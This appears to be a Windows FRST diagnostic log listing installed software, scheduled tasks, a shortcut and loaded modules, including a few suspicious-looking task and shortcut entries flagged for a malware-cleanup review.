Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
Intel® Chipset Device Software (x32 Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1167 - Intel Corporation)
Intel® Network Connections 20.2.3001.0 (HKLM\...\PROSetDX) (Version: 20.2.3001.0 - Intel)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 4.0.0.36 - Intel Corporation)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
Malwarebytes version 3.0.5.1299 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.5.1299 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.6073.1 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 368.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Orcs Must Die! Unchained (HKLM\...\Steam App 427270) (Version:  - Robot Entertainment)
Ostrich Island (HKLM-x32\...\Steam App 337270) (Version:  - MeDungeon Ltd.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Realtek USB Audio (HKLM-x32\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.41 - Realtek Semiconductor Corp.)
SafeZone Stable 1.48.2066.44 (x32 Version: 1.48.2066.44 - Avast Software) Hidden
SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.16-2 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.6650 - Broadcom Corporation)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D4FCD0B-833F-4673-AF4F-C1D32AB526D0} - System32\Tasks\{0DCDAAAA-93EF-49E2-AA0E-3E402E8F35FA} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {23C4AFE3-C344-4CC1-B947-6F7861B09475} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {3104D2E9-1327-4154-B022-A2E5A75C217A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2016-09-13] (PC-Doctor, Inc.)
Task: {34DEFD4E-26EB-489B-B544-9DCC0C99C02E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-08] (Adobe Systems Incorporated)
Task: {4680A0DC-A27E-4500-8101-3C3720F498FC} - System32\Tasks\{CCA1CD58-709C-423B-BBBB-0C7DBE39E355} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {4FBD19BD-BBF9-4DB7-B505-6228C0876E94} - System32\Tasks\{528BCCA3-349E-4E64-BAF5-C898CCD7538F} => C:\Users\Owner\Downloads\FixToolKotver64.exe
Task: {51B3635B-5D21-4E7D-A92A-01533537CCD7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-02] (AVAST Software)
Task: {555CC1F2-72BC-40E7-869B-59C3B9120774} - System32\Tasks\{6418743D-1170-48C9-9BCE-CBDA001F2EF3} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {5AC7F887-71CA-4AA1-96A4-0A5E34D1F1BB} - System32\Tasks\AdobeAAMUpdater-1.0-Owner-PC-Owner => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {67A0DA7E-E534-48A2-8A20-44047E59A2D5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {6C79847C-860A-4953-AA45-A65B21DF1150} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
Task: {800C4F0A-B96F-4306-8FC6-01AABCB3E309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {828E25EE-E30B-477C-BB58-2F53210A9F30} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe <==== ATTENTION
Task: {896E6B83-C449-4EBF-B8A0-8B6D8E8B78CD} - System32\Tasks\BullGuard\BullGuardUpdate2 => C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate2.exe [2016-12-12] (BullGuard Ltd.)
Task: {8DCDEE16-AEB7-42B2-B7F8-C48F3E74066D} - System32\Tasks\SafeZone scheduled Autoupdate 1458696918 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-09-06] (Avast Software)
Task: {8EBB3B0F-59FA-41FE-899B-DF576A5B1C11} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {B5CC74E1-44F2-46C0-9524-F3043147FDE8} - System32\Tasks\{0BBD4685-2739-46A6-8DF8-C548A726405D} => C:\Users\Owner\Downloads\FixToolKotver64.exe
Task: {BF380B2F-370F-4DE2-8998-A2681C51FFDB} - System32\Tasks\{B042A631-BD1D-41D8-901A-5601A5BAD7F0} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {D257D2D9-DBD5-4DE2-B470-0269294D41D0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated)
Task: {DA220C2C-86E5-4104-9CE4-34070D5F9C3D} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-10-03] (AVAST Software)
Task: {E75EB6BB-4C1C-40AB-A7F7-60D5A2D309FF} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-09-09] (Dell Inc.)
Task: {EEA26988-B289-48A6-A4F5-4F3D5FAB5A80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {F1C6BBBF-4E97-427D-B1DD-42BD81992A6E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat (No File)
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-12-12 07:32 - 2016-12-12 07:32 - 00727320 _____ () c:\program files\bullguard ltd\bullguard\SQLite.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00084248 _____ () c:\program files\bullguard ltd\bullguard\zlib1.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00644888 _____ () c:\program files\bullguard ltd\bullguard\LibXml2.dll
2015-12-22 21:46 - 2016-07-10 15:17 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00644888 _____ () C:\Program Files\BullGuard Ltd\BullGuard\LibXml2.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00064792 _____ () C:\Program Files\BullGuard Ltd\BullGuard\LIBBZ2.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00084248 _____ () C:\Program Files\BullGuard Ltd\BullGuard\zlib1.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-12-21 12:39 - 2016-12-14 12:55 - 02259232 _____ () D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2016-05-22 18:33 - 2016-05-22 18:33 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-12-12 07:32 - 2016-12-12 07:32 - 00727320 _____ () C:\Program Files\BullGuard Ltd\BullGuard\SQLite.dll
2016-05-28 23:38 - 2016-03-21 12:28 - 01357264 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-01-10 12:45 - 2017-01-10 12:45 - 03138632 _____ () C:\Program Files\AVAST Software\Avast\defs\17011001\algo.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-02-01 15:29 - 2016-12-08 07:13 - 00656160 _____ () D:\games\SDL2.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 04969248 _____ () D:\games\v8.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01563936 _____ () D:\games\icui18n.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01195296 _____ () D:\games\icuuc.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 02322720 _____ () D:\games\video.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 02549760 _____ () D:\games\libavcodec-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00442880 _____ () D:\games\libavutil-54.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00491008 _____ () D:\games\libavformat-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00332800 _____ () D:\games\libavresample-2.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00485888 _____ () D:\games\libswscale-3.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00838944 _____ () D:\games\bin\chromehtml.DLL
2016-03-14 08:25 - 2016-07-04 14:17 - 00266560 _____ () D:\games\openvr_api.dll
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-10-05 18:18 - 2016-10-05 18:18 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-12-15 08:51 - 2016-12-05 08:21 - 67304736 _____ () D:\games\bin\cef\cef.win7\libcef.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00388384 _____ () D:\games\steam.dll
2016-02-01 15:29 - 2015-09-24 15:52 - 00119208 _____ () D:\games\winh264.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 02144104 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 07955304 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00341352 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00028008 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00127336 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2016-08-04 13:36 - 2016-11-11 12:36 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-12-21 16:48 - 2016-11-11 12:37 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-08-04 13:36 - 2016-11-11 12:38 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-12-21 16:48 - 2016-11-11 12:38 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-12-21 16:48 - 2016-11-11 12:35 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-12-21 16:48 - 2016-12-21 10:26 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-12-21 16:48 - 2016-11-11 12:42 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-12-21 16:48 - 2016-11-11 12:42 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00171320 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
